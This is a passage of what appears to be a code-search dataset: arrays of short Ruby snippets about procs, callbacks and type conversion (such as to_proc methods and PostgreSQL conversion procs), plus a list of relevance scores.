"def to_proc\n lambda do |v|\n n = Version::Number.parse(v)\n n.send(operator, number)\n end\n end",
"def edit_as(arg = nil, &proc)\n # RAILS_DEFAULT_LOGGER.debug('set edit_as proc to ' + proc.inspect)\n if block_given?\n self.edit_as_proc = proc\n else\n self.edit_as_proc = Proc.new do\n arg.to_s\n end \n end\n end",
"def to_proc\n name, options, registry, variable_name = @name, @options, @registry, @iv_name\n Proc.new do\n build name => options\n registry.inject(instance_variable_get(:\"@#{variable_name}\")) do |value, (method, args, block)|\n value.send(method, *args, &block)\n end\n end\n end",
"def to_proc()\n #This is a stub, used for indexing\n end",
"def to_proc\n method(:call).to_proc\n end",
"def to_proc\n block = @block if @block\n value = @value\n lambda do |target, record|\n value = value.call(record) if value.respond_to? :call\n return target.send(setter, value) unless block\n if value.is_a? Enumerable\n values = value.map { |v| instance_exec(v, &block) }\n target.send(setter, values)\n else\n target.send(setter, instance_exec(value, &block))\n end\n end\n end",
"def convert_value(value, opts)\n if opts[:proc].is_a? Proc\n opts[:proc].(value)\n else\n value\n end\n end",
"def to_proc\n @to_proc ||= method(:transform).to_proc\n end",
"def call_a_proc(&my_proc)\n my_proc.call\nend",
"def to_proc\n -> target { self.call(target) }\n end",
"def to_proc\n -> target { self.call(target) }\n end",
"def to_proc\n -> x { actual(x) }\n end",
"def block_to_proc(&p)\n\tp.call\nend",
"def to_proc\n # since we're immutable we can keep this\n @extern_proc ||= method(:call).to_proc\n end",
"def add_named_conversion_proc(name, &block)\n unless oid = from(:pg_type).where(:typtype=>['b', 'e'], :typname=>name.to_s).get(:oid)\n raise Error, \"No matching type in pg_type for #{name.inspect}\"\n end\n add_conversion_proc(oid, block)\n end",
"def to_proc\n Proc.new { |target| self.call(target) }\n end",
"def to_proc\n Proc.new { |target| self.call(target) }\n end",
"def to_proc\n proc { |n| call(n) }\nend",
"def block=(proc)\n @value = nil\n @block = proc.to_proc\n end",
"def call_proc(val, &proc)\n proc ||= Proc.new { |data| data + \" you\" }\n proc.call(val)\nend",
"def to_proc\n self\n end",
"def set_procmode\n @procmode = Procmode.find(params[:id])\n end",
"def to_proc\n method(:transform).to_proc\n end",
"def my_each_with_proc(prc)\n #self.my_each_with_block(prc)\n #expection a block but passing in a prc\n self.my_each_with_block(&prc) # the & conver the prc back in to a block\n\n end",
"def to_proc\n eval \"Proc.new do\\n#{self}\\nend\"\n end",
"def initialize(proc)\n @proc = proc\n end",
"def call_a_proc(&block)\n block.call\nend",
"def as_proc(bind=nil)\n args_ext = self.args.map { |e| \"#{e} = fd[\\\"#{e}\\\"];\" }\n code = \"Proc.new do |fd|; #{args_ext.join \" \"} #{self.to_code}; end\"\n if bind # All objects have eval value, we bind when not nil\n # CAS::Help.assert(bind, Binding)\n bind.eval(code)\n else\n eval(code)\n end\n end",
"def run_proc_closure(p)\n p.call\nend",
"def proc\n if block_given?\n super\n else\n NamedProc::Proxy::Proc\n end\n end",
"def to_proc\n ->(**properties) { perform(**properties) }\n end",
"def with_key_transform(proc = nil, &block)\n fn = proc || block\n\n raise ArgumentError, \"a block or callable argument is required\" if fn.nil?\n\n handle = Dry::Types::FnContainer.register(fn)\n with(key_transform_fn: handle)\n end",
"def proc_factor(factor)\n Proc.new { |x| x * factor }\nend",
"def takes_a_proc( p )\n p.call\nend",
"def allow_conversion(meth=nil, &block)\n raise ArgumentError if meth.nil? && !block_given?\n self[:allow_conversion] ||= []\n self[:allow_conversion] << (meth || block)\n end",
"def _call_of(method)\n proc{ |*args| send(method, *args) }\n end",
"def on(callback_name, &block)\n raise(ArgumentError, \"Argument 'callback_name' must be a String.\") unless callback_name.is_a?(String)\n raise(ArgumentError, \"Argument 'callback_name' can not be '#{callback_name}'.\") if @@reserved_callbacks.include?(callback_name)\n raise(ArgumentError, \"Must have a Proc.\") unless block_given?\n @procs_callback[callback_name] = block\n return self\nend",
"def set(hook, warn: true, &block)\n Deprecation.warn(self, warning_for_set) if warn\n raise NoBlockGiven, \"a block is required when setting a callback\" unless block_given?\n @callbacks[hook] = proc(&block)\n end",
"def callback=(proc)\n # Save proc to instance variable so that GC doesn't free\n # the proc object before the transfer.\n @callback_proc = proc do |pTrans|\n proc.call(self)\n end\n @transfer[:callback] = @callback_proc\n end",
"def bind(proc=nil, &block)\n (proc || block).call(@value)\n end",
"def default_command_set_proc\n @command_set_proc_obj = closure_obj = {\n :command_called => false,\n :proc_called => false,\n }\n proc do\n closure_obj[:proc_called] = true\n command(\"test\", \"test command\") do\n closure_obj[:command_called] = true\n end\n end\n end",
"def conv_arg(arg, val = []) # :nodoc:\n if conv\n val = conv.call(*val)\n else\n val = proc {|v| v}.call(*val)\n end\n return arg, block, val\n end",
"def to_proc\n @_proc ||=\n begin\n case \n when _options[:_never]\n FALSE_PROC\n when _options[:_always]\n TRUE_PROC\n else\n _make_select_lambda to_hash\n end\n end\n end",
"def register_callback(id, &block)\n callback = block\n @registered_callbacks[id] = callback\n end",
"def register_callback(id, &block)\n callback = block\n @registered_callbacks[id] = callback\n end",
"def register_callback(id, &block)\n callback = block\n @registered_callbacks[id] = callback\n end",
"def register_callback(id, &block)\n callback = block\n @registered_callbacks[id] = callback\n end",
"def default_proc=(new_proc)\n @default = nil\n @default_proc = new_proc\n end",
"def formatter=(proc)\n @formatter = proc\n end",
"def to_proc\n # Use shadows since instance_eval/exec breaks ivars.\n name, arguments = @name, @arguments\n\n Proc.new { public_send(name, *arguments) }\n end",
"def set_func\n @func = Func.find(params[:id])\n end",
"def convert_from_ruby(val)\n @from_ruby.call(val)\n end",
"def define_type_convert(type, &block)\n @conversions ||= {}\n @conversions[type] = block\n end",
"def input_conv_num\n @shell_input_procs << proc do |args|\n args[0] = yield(args[0].to_i) if /^[0-9]+$/ =~ args[0]\n args\n end\n self\n end",
"def to_proc\n lambda { |path| new(path) }\n end",
"def add_observing_proc(id, &block)\n @observing_procs[id] = block\n update\n end",
"def run_handler=(proc)\n check_definition_state(is_method: true)\n tool_class.class_eval do\n define_method(:run, &proc)\n end\n end",
"def set_con_proc\n @con_proc = ConProc.find(params[:id])\n end",
"def callback\n @callback ||= :value.to_proc\n end",
"def exec_proc(fn)\n num = 1\n fn.call # 2 prints\nend",
"def invoke_callback_method(proc, *args) # :nodoc:\n proc.call(*args) if proc.is_a?(Proc)\n end",
"def convert_type_proc(v)\n case v\n when Java::OrgPostgresqlJdbc4::Jdbc4Array\n PGArrayConverter.new(method(:convert_type_proc))\n when Java::OrgPostgresqlUtil::PGobject\n PG_OBJECT_METHOD\n else\n super\n end\n end",
"def Resolve(maybe_proc, context = nil)\n if maybe_proc.is_a? Proc or maybe_proc.is_a? Method\n if context\n if maybe_proc.arity > 0\n context.instance_eval(&maybe_proc)\n else\n # In case it's a lambda with zero arity instance_eval fails\n context.instance_exec(&maybe_proc)\n end\n else\n maybe_proc.()\n end\n else\n maybe_proc\n end\n end",
"def lut_set_proc(lut_key, block)\n lut_proc[lut_key.to_sym] = block\n end",
"def message_handler(&message_proc)\n @message_proc = message_proc\n end",
"def my_method(&the_proc)\n the_proc\nend",
"def invoker(procObj, param1)\n puts \"Invoking #{procObj} on #{param1.to_s}\"\n procObj.call param1\nend",
"def converters=(_arg0); end",
"def initialize(id, processing_methods=[])\n @id, @processing_methods = id, processing_methods\n yield(self) if block_given?\n end",
"def run_block\n p = Proc.new # <1>\n p.call\nend",
"def make_setter( key )\n\t\treturn Proc.new {|new_value| self.namespaced_hash[ key.to_sym ] = new_value }\n\tend",
"def map_char(ident, &block) ; map_primitive(:char, ident, &block) ; end",
"def convert(obj)\n ret = convert_proc.call(obj)\n filters.execute(ret)\n end",
"def set(sym, val)\n root = EM::Rserve::R::RubytoR::Translator.ruby_to_r val\n\n assign(sym, root) do |req|\n req.errback do |err|\n fiber.resume nil\n end\n req.callback do |msg|\n fiber.resume val\n end\n end\n\n Fiber.yield\n end",
"def proc_method(&my_proc)\n puts \"method start\"\n my_proc.call\n puts \"method end\"\nend",
"def register_callback(&block)\n @_aclize_callback = block\n end",
"def default_proc() end",
"def cast_or_call(cc, mod, fun, *args)\n req = t[cc, mod.to_sym, fun.to_sym, args]\n write_berp(req)\n read_berp\n end",
"def callback( which, *args )\n block = instance_variable_get( \"@on_#{which.to_s}\" )\n block.call( *args ) if block\n end"
] |
[
"0.69231147",
"0.65239",
"0.63744646",
"0.6109321",
"0.6109321",
"0.6109321",
"0.6096786",
"0.6083638",
"0.599398",
"0.599398",
"0.5993846",
"0.5963998",
"0.5879365",
"0.5862984",
"0.5833793",
"0.5791118",
"0.5768658",
"0.56523377",
"0.56225663",
"0.5618568",
"0.5593497",
"0.55666244",
"0.5530083",
"0.55249316",
"0.5502549",
"0.54887795",
"0.5480015",
"0.5462138",
"0.54156786",
"0.5390706",
"0.5365996",
"0.5365996",
"0.53651714",
"0.5317038",
"0.53116447",
"0.5306865",
"0.5265177",
"0.5265177",
"0.5230855",
"0.5202294",
"0.5164511",
"0.515289",
"0.5126342",
"0.51247466",
"0.5094765",
"0.5090855",
"0.50828266",
"0.50780445",
"0.5045577",
"0.5032839",
"0.5010959",
"0.4997284",
"0.49838448",
"0.4957421",
"0.49334696",
"0.4905188",
"0.49009645",
"0.49005923",
"0.48913944",
"0.4858712",
"0.4856265",
"0.4853208",
"0.48514235",
"0.48386475",
"0.48372412",
"0.48372412",
"0.48372412",
"0.48372412",
"0.4829602",
"0.48238215",
"0.4822986",
"0.48202112",
"0.4808224",
"0.48021096",
"0.47978878",
"0.47935495",
"0.4773965",
"0.47448263",
"0.47442305",
"0.47408354",
"0.47360858",
"0.4729683",
"0.47242275",
"0.47198492",
"0.47079548",
"0.47004932",
"0.4692085",
"0.46573323",
"0.46436998",
"0.46317267",
"0.46305567",
"0.4628671",
"0.46250522",
"0.46157897",
"0.46097362",
"0.4595904",
"0.45934075",
"0.45906478",
"0.45896176",
"0.4584656"
] |
0.8385225
|
0
|
Add a conversion proc for a named type, using the given block. This should be used for types without fixed OIDs, which includes all types that are not included in a default PostgreSQL installation.
|
def add_named_conversion_proc(name, &block)
unless oid = from(:pg_type).where(:typtype=>['b', 'e'], :typname=>name.to_s).get(:oid)
raise Error, "No matching type in pg_type for #{name.inspect}"
end
add_conversion_proc(oid, block)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def define_type_convert(type, &block)\n @conversions ||= {}\n @conversions[type] = block\n end",
"def register_type(type, &block)\n register CastWhenType.new(type, &block)\n end",
"def cast_with_proc(obj, type)\n if (type == :proc || obj.is_a?(::Proc)) && obj.respond_to?(:to_source)\n :proc\n else\n cast_without_proc(obj, type)\n end\n end",
"def add_conversion_proc(oid, callable=nil, &block)\n conversion_procs[oid] = callable || block\n end",
"def convert_type_proc(v)\n case v\n when Java::OrgPostgresqlJdbc4::Jdbc4Array\n PGArrayConverter.new(method(:convert_type_proc))\n when Java::OrgPostgresqlUtil::PGobject\n PG_OBJECT_METHOD\n else\n super\n end\n end",
"def to_ruby(type_name)\n SIMPLE_TYPES[type_name][1] || lambda {|param| param}\n end",
"def to_detect_type_by(name, &block)\n Reflection.to_detect_type_by(name, &block)\n end",
"def newfiletype(name, &block)\n return if @filetypes&.key?(name)\n\n base_newfiletype(name, &block)\n end",
"def converter(a_lamda=nil, &block)\n if a_lamda.nil?\n if block_given?\n # TODO: same the block in such a way that it can be called\n @params[:converter] = block\n else\n error \"converter statement without a procedure #{location}\"\n end\n else\n unless Proc == a_lamda.class\n error \"converter expects a proc/lamda but got a #{a_lamda.class} #{location}\"\n else\n @params[:converter] = a_lamda\n end\n end\n end",
"def create_proc(name, columns=[], options={}, &block)\n if select_value(\"SELECT count(oid) FROM pg_language WHERE lanname = 'plpgsql' \",\"count\").to_i == 0\n# execute(\"CREATE FUNCTION plpgsql_call_handler() RETURNS language_handler AS '$libdir/plpgsql', 'plpgsql_call_handler' LANGUAGE c\")\n execute(\"CREATE TRUSTED PROCEDURAL LANGUAGE plpgsql HANDLER plpgsql_call_handler\")\n end\n\n if options[:force]\n drop_proc(name, columns) rescue nil\n end\n\n if block_given?\n execute get_proc_query(name, columns, options) { yield }\n elsif options[:resource]\n execute get_proc_query(name, columns, options)\n else\n raise StatementInvalid.new(\"Missing function source\")\n end\n end",
"def register_type(key, &block)\n raise_type_defined(key) if present?(key)\n types[key] = block\n end",
"def convert_schema_to_type(table_name, *)\n converter = SchemaConverter.new(table_name: table_name, is_snake_case: @is_snake_case)\n yield converter\n @converted_types.concat converter.converted_type_lines\n end",
"def register_block_for(type, &blk); end",
"def type_from_block(name, &block)\n raise ArgumentError unless block_given?\n\n const_set(\n \"InlineType_#{name.to_s.capitalize}\",\n Class.new(Refined) { class_eval(&block) }\n )\n end",
"def create_proc(name, columns=[], options={}, &block)\n if select_value(\"SELECT count(oid) FROM pg_language WHERE lanname = 'plpgsql' \",\"count\").to_i == 0\n execute(\"CREATE FUNCTION plpgsql_call_handler() RETURNS language_handler AS '$libdir/plpgsql', 'plpgsql_call_handler' LANGUAGE c\")\n execute(\"CREATE TRUSTED PROCEDURAL LANGUAGE plpgsql HANDLER plpgsql_call_handler\")\n end\n\n if options[:force]\n drop_proc(name, columns) rescue nil\n end\n\n if block_given?\n execute get_proc_query(name, columns, options) { yield }\n elsif options[:resource]\n execute get_proc_query(name, columns, options)\n else\n raise StatementInvalid.new(\"Missing function source\")\n end\n end",
"def add_object_conversion( oid, conversion=nil )\n\t\tconversion = Proc.new if block_given?\n\t\t@object_conversions[ oid ] = conversion\n\tend",
"def procedure(returntype, name, number, argtype, &block)\n\t\tnewproc = Procedure.new(number, returntype, argtype, &block)\n\t\tadd_procedure(name, number, newproc)\n\tend",
"def register(type_converter)\n types.push type_converter\n end",
"def cast_type_literal(type)\n type_literal(:type=>type)\n end",
"def add_type_converter(type, r2c, c2r)\n warn \"WAR\\NING: overridding #{type} on #{caller[0]}\" if @@type_map.has_key? type\n @@type_map[type] = [r2c, c2r]\n end",
"def conversion(&block)\n self.converter = block\n end",
"def add_translator( type, &block ) # :yields: type, value\n @translators[ type_name( type ) ] = block\n end",
"def register_type_mapping(runtime_type, puppet_type_or_pattern, _ = nil)\n TypeAsserter.assert_assignable('First argument of type mapping', PRuntimeType::RUBY, runtime_type)\n expr = runtime_type.name_or_pattern\n if expr.is_a?(Array)\n TypeAsserter.assert_instance_of('Second argument of type mapping', TYPE_REGEXP_SUBST, puppet_type_or_pattern)\n register_implementation_regexp(puppet_type_or_pattern, expr)\n else\n TypeAsserter.assert_instance_of('Second argument of type mapping', PTypeType::DEFAULT, puppet_type_or_pattern)\n register_implementation(puppet_type_or_pattern, expr)\n end\n end",
"def add_mapper_for(type, &block)\n mappers[type] = block\n end",
"def register_type(type, klass, method_name, &block)\n end",
"def register(type, &block)\n extensions = @types[type.meta[:database]]\n db_type = type.meta[:db_type]\n\n mod = Module.new(&block)\n ctx = Object.new.extend(mod)\n functions = mod.public_instance_methods.each_with_object({}) { |m, ms|\n ms[m] = ctx.method(m)\n }\n extensions[db_type] = (extensions[db_type] || {}).merge(functions)\n end",
"def register_spec_type(*args, &block); end",
"def coerce_type_to_symbol\n @type = @type.to_sym\n end",
"def register(name, &block)\n\n # Create the message decoder and register it to the handler.\n decoder = ProcMessageDecoder.new block\n @handler.register_decoder name, decoder\n end",
"def to_proc() end",
"def to_proc() end",
"def add_type(type)\n\n # does nothing, types are differentiated by the 'typ' column\n end",
"def infer_Module(o)\n PTypeType::new(PRuntimeType.new(:ruby, o.name))\n end",
"def cast_types; end",
"def sexp_newtype_block\n program = sexp[1]\n\n program.each do |s|\n if s[0] == :method_add_block and\n s[1][0] == :method_add_arg and\n s[1][1][0] == :call and\n s[1][1][1][0] == :const_path_ref and\n s[1][1][1][1][0] == :var_ref and\n s[1][1][1][1][1][0..1] == [:@const, \"Puppet\"] and\n s[1][1][1][2][0..1] == [:@const, \"Type\"] and\n s[1][1][3][0..1] == [:@ident, \"newtype\"] and\n s[2][0] == :do_block\n\n return s[2][2]\n end\n end\n\n []\n end",
"def __on(type_name, &block)\n __node(\"... on #{type_name}\", {}, &block)\n end",
"def add_type(type)\n\n # does nothing, types are differentiated by the 'typ' column\n end",
"def type_name_to_type(params)\n type = types.name_to_type(params[:type_name])\n params[:type] = type\n params.delete(:type_name)\n params\n end",
"def add_type(type)\n end",
"def add(type, filter=nil, &block)\n if((filter.nil? && !block_given?) || (filter && !filter.is_a?(Filter)))\n raise ArgumentError.new('Filter or proc must be provided for filter')\n end\n const = Splib.find_const(type)\n type = const unless const.nil?\n @lock.synchronize do\n @filters[type] ||= {}\n end\n if(block_given?)\n unless(block.arity == 1 || block.arity < 0)\n raise ArgumentError.new('Block must accept a parameter')\n end\n @lock.synchronize do\n @filters[type][:procs] ||= []\n unless(@filters[type][:procs].include?(block))\n @filters[type][:procs] << block\n end\n end\n end\n if(filter)\n @lock.synchronize do\n unless(@filters[type].include?(filter))\n @filters[type][:filters] ||= []\n unless(@filters[type][:filters].include?(filter))\n @filters[type][:filters] << filter\n end\n end\n end\n end\n filter ? block_given? ? [filter, block] : filter : block\n end",
"def register_row_type(db_type, opts=OPTS)\n procs = @conversion_procs\n rel_oid = nil\n array_oid = nil\n parser_opts = {}\n\n # Try to handle schema-qualified types.\n type_schema, type_name = schema_and_table(db_type)\n schema_type_string = type_name.to_s\n\n # Get basic oid information for the composite type.\n ds = from(:pg_type).\n select{[pg_type[:oid], :typrelid, :typarray]}.\n where([[:typtype, 'c'], [:typname, type_name.to_s]])\n if type_schema\n ds = ds.join(:pg_namespace, [[:oid, :typnamespace], [:nspname, type_schema.to_s]])\n schema_type_symbol = :\"pg_row_#{type_schema}__#{type_name}\" \n else\n schema_type_symbol = :\"pg_row_#{type_name}\"\n end\n unless row = ds.first\n raise Error, \"row type #{db_type.inspect} not found in database\"\n end\n # Manually cast to integer using to_i, because adapter may not cast oid type\n # correctly (e.g. swift)\n parser_opts[:oid], rel_oid, array_oid = row.values_at(:oid, :typrelid, :typarray).map(&:to_i)\n\n # Get column names and oids for each of the members of the composite type.\n res = from(:pg_attribute).\n join(:pg_type, :oid=>:atttypid).\n where(:attrelid=>rel_oid).\n where{attnum > 0}.\n exclude(:attisdropped).\n order(:attnum).\n select_map{[:attname, Sequel.case({0=>:atttypid}, pg_type[:typbasetype], pg_type[:typbasetype]).as(:atttypid)]}\n if res.empty?\n raise Error, \"no columns for row type #{db_type.inspect} in database\"\n end\n parser_opts[:columns] = res.map{|r| r[0].to_sym}\n parser_opts[:column_oids] = res.map{|r| r[1].to_i}\n\n # Using the conversion_procs, lookup converters for each member of the composite type\n parser_opts[:column_converters] = parser_opts[:column_oids].map do |oid|\n procs[oid]\n end\n\n # Setup the converter and typecaster\n parser_opts[:converter] = opts.fetch(:converter){HashRow.subclass(db_type, parser_opts[:columns])}\n parser_opts[:typecaster] = opts.fetch(:typecaster, parser_opts[:converter])\n\n parser = Parser.new(parser_opts)\n add_conversion_proc(parser.oid, parser)\n\n if respond_to?(:register_array_type) && array_oid && array_oid > 0\n array_type_name = if type_schema\n \"#{type_schema}.#{type_name}\"\n else\n type_name\n end\n register_array_type(array_type_name, :oid=>array_oid, :converter=>parser, :scalar_typecast=>schema_type_symbol)\n end\n\n @row_types[literal(db_type)] = opts.merge(:parser=>parser, :type=>db_type)\n @row_schema_types[schema_type_string] = schema_type_symbol \n @schema_type_classes[schema_type_symbol] = ROW_TYPE_CLASSES\n @row_type_method_module.class_eval do\n meth = :\"typecast_value_#{schema_type_symbol}\"\n define_method(meth) do |v|\n row_type(db_type, v)\n end\n private meth\n alias_method(meth, meth)\n end\n\n nil\n end",
"def map_primitive(name, ident, &block)\n lang_eval do\n @prim_ident[name.to_sym] = ident.to_s\n @prim_to_lit[name.to_sym] = block\n end\n nil\n end",
"def register(name, &block)\n transformations[name] = block\n end",
"def __typedeaf_handle_nested_block(parameters, args, block)\n if block && parameters[:block]\n args << block\n end\n return nil\n end",
"def add_pg_decoders\n if @config[:use_follower_reads_for_type_introspection]\n @default_timezone = nil\n @timestamp_decoder = nil\n\n coders_by_name = {\n \"int2\" => PG::TextDecoder::Integer,\n \"int4\" => PG::TextDecoder::Integer,\n \"int8\" => PG::TextDecoder::Integer,\n \"oid\" => PG::TextDecoder::Integer,\n \"float4\" => PG::TextDecoder::Float,\n \"float8\" => PG::TextDecoder::Float,\n \"numeric\" => PG::TextDecoder::Numeric,\n \"bool\" => PG::TextDecoder::Boolean,\n \"timestamp\" => PG::TextDecoder::TimestampUtc,\n \"timestamptz\" => PG::TextDecoder::TimestampWithTimeZone,\n }\n\n known_coder_types = coders_by_name.keys.map { |n| quote(n) }\n query = <<~SQL % known_coder_types.join(\", \")\n SELECT t.oid, t.typname\n FROM pg_type as t AS OF SYSTEM TIME '-10s'\n WHERE t.typname IN (%s)\n SQL\n\n coders = execute_and_clear(query, \"SCHEMA\", []) do |result|\n result\n .map { |row| construct_coder(row, coders_by_name[row[\"typname\"]]) }\n .compact\n end\n\n map = PG::TypeMapByOid.new\n coders.each { |coder| map.add_coder(coder) }\n @connection.type_map_for_results = map\n\n @type_map_for_results = PG::TypeMapByOid.new\n @type_map_for_results.default_type_map = map\n @type_map_for_results.add_coder(PG::TextDecoder::Bytea.new(oid: 17, name: \"bytea\"))\n @type_map_for_results.add_coder(MoneyDecoder.new(oid: 790, name: \"money\"))\n\n # extract timestamp decoder for use in update_typemap_for_default_timezone\n @timestamp_decoder = coders.find { |coder| coder.name == \"timestamp\" }\n update_typemap_for_default_timezone\n else\n super\n end\n rescue ActiveRecord::StatementInvalid => e\n raise e unless e.cause.is_a? PG::InvalidCatalogName\n # use original if database is younger than 10s\n super\n end",
"def sproc_type=(type)\n @sproc_type = type\n @opts[:sql] = ''\n end",
"def resolve_type(type, object, ctx = :__undefined__)\n check_resolved_type(type, object, ctx) do |ok_type, ok_object, ok_ctx|\n if @resolve_type_proc.nil?\n raise(NotImplementedError, \"Can't determine GraphQL type for: #{ok_object.inspect}, define `resolve_type (type, obj, ctx) -> { ... }` inside `Schema.define`.\")\n end\n @resolve_type_proc.call(ok_type, ok_object, ok_ctx)\n end\n end",
"def register_postprocessor(mime_type, klass, proc = nil, &block)\n proc ||= block\n mutate_hash_config(:postprocessors, mime_type) do |processors|\n processors.push(wrap_processor(klass, proc))\n processors\n end\n end",
"def set_type(name)\n @type = name\n ProcessRecord::TYPE_TABLE[name] = self\n end",
"def type_from_object( object, block=nil )\n\t\tcase object\n\t\twhen Module\n\t\t\tself.log.debug \"Deriving a type from module %p\" % [ object ]\n\t\t\treturn self.type_from_module( object )\n\n\t\twhen Method, UnboundMethod\n\t\t\tself.log.debug \"Deriving a type from method %p\" % [ object ]\n\t\t\treturn self.type_from_method( object )\n\n\t\twhen Array\n\t\t\tself.log.debug \"Deriving a type from context %p\" % [ object ]\n\t\t\treturn self.type_from_context( *object )\n\n\t\twhen Proc\n\t\t\tself.log.debug \"Deriving a type from context proc %p\" % [ object ]\n\t\t\treturn self.type_from_context_proc( object )\n\n\t\twhen String\n\t\t\tself.log.debug \"Using string %p as type\" % [ object ]\n\t\t\treturn object\n\n\t\telse\n\t\t\traise \"don't know how to derive an event type from a %p\" % [ object.class ]\n\t\tend\n\tend",
"def bind_name(name, type)\n @names[name.to_sym] = type unless name.nil?\n end",
"def cpptype2(generic_type)\n CPLUSPLUS_TYPES2[generic_type] || camelcasetype(generic_type)\nend",
"def add_attribute_conversion( oid, conversion=nil )\n\t\tconversion = Proc.new if block_given?\n\t\t@attribute_conversions[ oid ] = conversion\n\tend",
"def add_converter(var_name, const, name = nil, &converter)\n if name.nil? # custom converter\n instance_variable_get(var_name) << converter\n else # named converter\n combo = const[name]\n case combo\n when Array # combo converter\n combo.each do |converter_name|\n add_converter(var_name, const, converter_name)\n end\n else # individual named converter\n instance_variable_get(var_name) << combo\n end\n end\n end",
"def datatype(name, params, block, type_params, &type_block)\n define name, params, block, { :using => DataType }.merge(type_params) do\n #p [:self, __doodle__.__inspect__]\n #p [:checking_values, values, values.class]\n if respond_to?(:values)\n if values.kind_of?(Range)\n must \"be in range #{values}\" do |s|\n values.include?(s)\n end\n # array of values\n elsif values.respond_to?(:size) && values.size > 0\n must \"be one of #{values.join(', ')}\" do |s|\n values.include?(s)\n end\n end\n end\n if respond_to?(:match) && match\n must \"match pattern #{match.inspect}\" do |s|\n #p [:matching, s, da.match.inspect]\n s.to_s =~ match\n end\n end\n instance_eval(&type_block) if type_block\n end\n end",
"def block_to_proc(&p)\n\tp.call\nend",
"def to_type()\n callables = dispatchers.map do | dispatch |\n t = Puppet::Pops::Types::PCallableType.new()\n # TODO: handle that dispatch.type may be an ArrayType instead of a TupleType\n t2 = dispatch.type\n t.param_types = Puppet::Pops::Types::TypeCalculator.copy_as_tuple(t2)\n # TODO: Function does not have a block type yet\n t\n end\n if callables.size > 1\n # multiple signatures, produce a Variant type of Callable1-n\n t = Puppet::Pops::Types::PVariantType.new()\n t.types = callables\n t\n else\n # single signature, produce single Callable\n callables.pop\n end\n end",
"def block(name, &block)\n klass = SuperbTextConstructor.block(name, &block)\n @blocks << klass\n klass\n end",
"def visit_blob(binding_type)\n #TODO: consider moving the conversion right in here.\n self.result = binding_type.to_ruby(input)\n end",
"def register_spec_type *args, &block\n if block then\n matcher, klass = block, args.first\n else\n matcher, klass = *args\n end\n TYPES.unshift [matcher, klass]\n end",
"def resolve_type(type, object, ctx = :__undefined__)\n check_resolved_type(type, object, ctx) do |ok_type, ok_object, ok_ctx|\n if @resolve_type_proc.nil?\n raise(GraphQL::RequiredImplementationMissingError, \"Can't determine GraphQL type for: #{ok_object.inspect}, define `resolve_type (type, obj, ctx) -> { ... }` inside `Schema.define`.\")\n end\n @resolve_type_proc.call(ok_type, ok_object, ok_ctx)\n end\n end",
"def on(type, &block)\n callbacks[type.to_sym] ||= []\n callbacks[type.to_sym] << block\n end",
"def default_handler(&block)\n type_handles.default = (block || lambda {|*args, &block| })\n end",
"def add(name, &block)\n blocks[name.to_sym] = block\n end",
"def add_block(block)\n return if ilp.has_variable?(block)\n ilp.add_variable(block)\n lhs = block_frequency(block) + [[block, -1]]\n ilp.add_constraint(lhs,\"equal\",0,\"block_#{block.qname}\", :structural)\n end",
"def convert_signature symbol, in_type, out_type\r\n [ symbol.to_s.sub(\"niScope\", \"rbScope\").to_sym,\r\n in_type.map{|t| types[:ruby][t] || t },\r\n out_type\r\n ]\r\n end",
"def convert_type(type)\n return TYPE_CONVERTER[type]\n end",
"def type\n if @type.is_a?(Proc)\n # lazy-eval it\n @type = @type.call\n end\n @type\n end",
"def convert_text_column_storage_type(table_name, column_name, to_type, temp_column_name)\n quoted_table_name = quote_table_name(table_name)\n orig_col = quote_column_name(column_name)\n temp_col = quote_column_name(temp_column_name || 'oee_temp_col')\n cmds = <<-SQL\n alter table #{quoted_table_name} add #{temp_col} #{to_type}\n update #{quoted_table_name} set #{temp_col} = #{orig_col}\n alter table #{quoted_table_name} drop column #{orig_col}\n alter table #{quoted_table_name} rename column #{temp_col} to #{orig_col}\n SQL\n cmds.split(\"\\n\").map(&:strip).each{|cmd| execute cmd}\n end",
"def resolve_type(type)\n (@udts ||= {})[type] ||= begin\n sql = <<-sql\n SELECT st.name AS storage_type\n FROM systypes s, systypes st\n WHERE s.type = st.type\n AND st.name NOT IN ('longsysname', 'nchar', 'nvarchar', 'sysname', 'timestamp')\n AND s.name = '#{type}'\n sql\n\n select_one(sql, \"Field type for #{type}\")['storage_type'].strip\n end\n end",
"def lookup_cpptype(t) t = @@typemap[t] and return t end",
"def add_type\n @item.type = bibtex_type\n end",
"def process_type_or_module(obj, parent)\n @first_comment ||= Digest::MD5.hexdigest(obj.comment) if obj.comment\n type = obj.is_module? ? :modules : :classes\n # One important note about the code_objects.rb structure. A class or module\n # definition can be spread a cross many files in Ruby so code_objects.rb handles\n # this by keeping only *one* reference to each class or module that has a definition\n # at the root level of a file (ie. not contained in another class or module).\n # This means that when we are processing files we may run into the same class/module\n # twice. So we need to keep track of what classes/modules we have\n # already seen and make sure we don't create two INSERT statements for the same\n # object.\n if(!@already_processed.has_key?(obj.full_name)) then \n parent = CodeContainer.find_by_name(parent.name) || CodeContainer.find_by_name(parent.file_relative_name)\n p = case type\n when :modules\n \n CodeModule.create_or_update_by_name_and_code_container_id(:code_container_id => parent.try(:id), :name => obj.name, :full_name => obj.full_name, :superclass => obj.superclass, :line_code => (MODULES[@file.file_absolute_name][obj.full_name][:line] if MODULES[@file.file_absolute_name]))\n when :classes\n \n CodeClass.create_or_update_by_name_and_code_container_id(:code_container_id => parent.try(:id), :name => obj.name, :full_name => obj.full_name, :superclass => obj.superclass, :line_code => (CLASSES[@file.file_absolute_name][obj.full_name][:line] if CLASSES[@file.file_absolute_name]))\n end\n comment = CodeComment.create_or_update_by_owner_id_and_owner_type :exported_body => obj.comment, :owner_id => p.id, :owner_type => p.class unless obj.comment.blank?\n @containers << p.id\n @comments << comment.id if comment\n\n @already_processed[obj.full_name] = true \n \n # Process all of the objects that this class or module contains\n obj.method_list.each { |child| process_method(child, obj) }\n obj.aliases.each { |child| process_alias(child, obj) }\n obj.constants.each { |child| process_constant(child, obj) }\n obj.requires.each { |child| process_require(child, obj) }\n obj.includes.each { |child| process_include(child, obj) }\n obj.attributes.each { |child| process_attribute(child, obj) } \n end\n \n id = @already_processed[obj.full_name]\n # Recursively process contained subclasses and modules \n obj.each_classmodule do |child| \n \tprocess_type_or_module(child, obj) \n end\n \n end",
"def procasaurus( &block )\n\tputs \"I am a procasaurus.\"\n\tputs block.class\n\t# note the proc must be the last parameter and must start with ampersand\nend",
"def resolve_type(object)\n instance_exec(object, &@resolve_type_proc)\n end",
